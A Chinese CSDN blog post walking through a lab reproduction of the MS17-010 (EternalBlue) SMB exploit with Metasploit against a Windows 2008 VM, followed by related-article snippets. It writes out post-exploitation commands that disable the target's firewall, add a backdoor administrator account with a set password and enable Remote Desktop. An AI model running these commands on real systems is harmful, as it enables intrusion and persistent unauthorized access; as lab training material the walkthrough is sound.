漏洞复现-MS17-010(永恒之蓝)

最新推荐文章于 2024-04-21 23:56:53 发布
最新推荐文章于 2024-04-21 23:56:53 发布
阅读量317 收藏 2
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43870289/article/details/104627283
版权

文章目录

漏洞介绍

永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码。
注:SMB服务的作用:该服务在Windows与UNIX系列OS之间搭起一座桥梁,让两者的资源可互通有无

复现环境

攻击机:kali    IP:192.168.232.130
靶 机:windows 2008 IP:192.168.232.129
启动数据库:Msfdb start 或者 service postgresql start
启动数据库的话运行msf会更快,可开可不开,看自己心情

1、启动msfconsole

输入msfconsole
在这里插入图片描述

2、搜索ms17_010漏洞

在这里插入图片描述

3、用搜索模块对靶机进行漏洞扫描

在这里插入图片描述
在这里插入图片描述
存在漏洞

4、攻击

back,选择攻击模块
在这里插入图片描述
在这里插入图片描述
set payload :设置payload(有效载荷)
在这里插入图片描述
set lhost:设置攻击者IP
在这里插入图片描述
在这里插入图片描述
netsh advfirewall set allprofiles state off
关闭目标防火墙
在这里插入图片描述
在这里插入图片描述

5、后渗透

2008会检测密码复杂性,不能设弱口令密码
创建用户名密码 blue/!@#$1234qwe

C:\Windows\system32>net user blue !@#$1234qwe /add

在这里插入图片描述
将用户blue添加入管理组
C:\Windows\system32>net localgroup administrators blue /add
在这里插入图片描述
开启远程桌面功能
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
在这里插入图片描述
远程桌面连接
rdesktop 192.168.232.129:3389
在这里插入图片描述
在这里插入图片描述

滕财然
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Ms17-010永恒之蓝漏洞复现
千寻的博客
01-04 1488
Ms17-010永恒之蓝漏洞复现 0x00 漏洞介绍 永恒之蓝是指2017年4月14日晚, “永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限 2017年5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,在多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。 0x01漏洞原理 永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对S...
MS17-010永恒之蓝漏洞复现
afei001
10-31 555
漏洞来源     永恒之蓝是2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布的一大批网络攻击工具中的其中一个。“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒。 漏洞复现 实验一:获取windows server 2008的shell 实验环境:攻击机:kali        ...
Linux kali虚拟机利用msf框架对win7的永恒之蓝渗透
yeshankuangrenaaaaa的博客
12-06 1万+
Linux kali虚拟机利用msf框架对win7的永恒之蓝渗透 术语 渗透攻击(exploit),指由攻击者或渗透测试者利用一个系统、应用或服务中的安全 漏洞,所进行的攻击行为。 攻击载荷(payload),是我们期望目标系统在渗透攻击之后去执行的代码 shellcode,是在渗透攻击时作为攻击载荷运行的一组机器指令,通常用汇编语言编写 模块(Module),指Metasploit框架中所使用...
开发实战(6)--对fofa收集的漏洞资产使用poc进行批量验证
最新发布
weixin_72543266的博客
04-21 1276
对收集的漏洞信息进行批量监测的一个通用脚本,本质是可以做一个通用的漏洞批量监测的通用模板,可惜的是没有成功获得可以进行测试的weblogic的资产,但是还是发现狮子鱼确实漏洞资产很多可以进行验证.t=N7T8t=N7T8安全开发实战http://t.csdnimg.cn/Ba4Ru。
Kali--MSF-永恒之蓝详解(复现、演示、远程、后门、加壳、修复)
Innocence_0的博客
02-26 1905
永恒之蓝(EternalBlue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日,不法分子通过改造“永恒之蓝”制作了wannacry程序,使全世界大范围内遭受了该程序,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。但不过在该程序出来不久就被微软通过打补丁修复了。为了维持操作系统的安全,我们能做到的是及时更新,安装补丁,关闭不必要的服务和端口。
vulhub漏洞复现 CVE-2016-3088
03-14
vulhub漏洞复现 CVE-2016-3088
永恒之蓝漏洞复现(ms17-010) 及windows日志对比分析
Sp4rkW的博客
01-27 6543
漏洞描述 Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。 影响版本 目前已知受影响的Windows 版本包括但不限于:WindowsNT,Windows2000、Windows ...
永恒之蓝漏洞利用及攻击
热门推荐
wwl012345的博客
04-20 9万+
一、基础知识介绍: 1.何为永恒之蓝永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎...
永恒之蓝(MS17-010)漏洞复现及msf常用渗透命令
Fengsheng96的博客
08-10 2576
环境部署 靶机:win7 工具机:kali,nessus 攻击步骤 1、nessus扫描靶机 根据扫描结果查看漏洞
永恒之蓝(EternalBlue)漏洞利用实例
桂华流瓦的别致小院
05-15 1万+
1、升级kali-rolling a、修改更新源 vim /etc/apt/sources.list,只保留官方更新源“deb http://http.kali.org/kali kali-rolling main non-free contrib”将其他更新源注释掉; b、更新 apt-get update && apt-get upgrade 2、安装wine32 root@kali:
永恒之蓝漏洞复现(ms17-010)
good good study
01-20 2万+
Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。
kali linux 之复现永恒之蓝ms17-010漏洞
weixin_42298807的博客
08-16 5033
一、实验目的 通过永恒之蓝漏洞获取Windows系统的权限 二、实验环境 WMware 虚拟机 Windows 7 64 位 (IP:192.168.148.139) kali linux (192.168.148.128) 三、实验步骤 1、扫描网络中的主机 扫描192.168.148.0网段中存活主机的操作系统类型 发现可以攻击的主机192.168.148.139 2、扫描漏洞 开启met...
北京华顺信安 安全服务面试经验分享
hackzkaq的博客
03-31 1393
更多黑客技能 公众号:渗透师老A 作者:掌控安全学员-逸辰 ​所面试的公司:北京华顺信安(白帽汇) 薪资待遇: 保密。不过给到满意了,因为是一线城市,也不会牵涉二三线转一线不加薪的忧虑。 而且hr和主管都蛮好的,嘿嘿。 所在城市:北京 面试职位:安全服务工程师 面试过程:电话面试。总共经历了三次面试。还有两三次人力资源的沟通。 面试官的问题: 1.自我介绍 巴拉巴拉~ 2.红蓝队经验 巴拉巴拉~ 红队的话主要就是地市级别的多一些,以抢时间为主,一般都是三个人,一般按照1(沟通整理资产)1(打点)1(提
ms17-010永恒之蓝漏洞复现与处理
06-06
对于 ms17-010永恒之蓝漏洞复现和处理,需要进行以下几个步骤: 1. 确认系统是否存在漏洞:检查系统是否存在 SMB 服务,如果存在并且版本为 Windows 7、Windows Server 2008 R2 或更高版本,则可能存在该漏洞...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值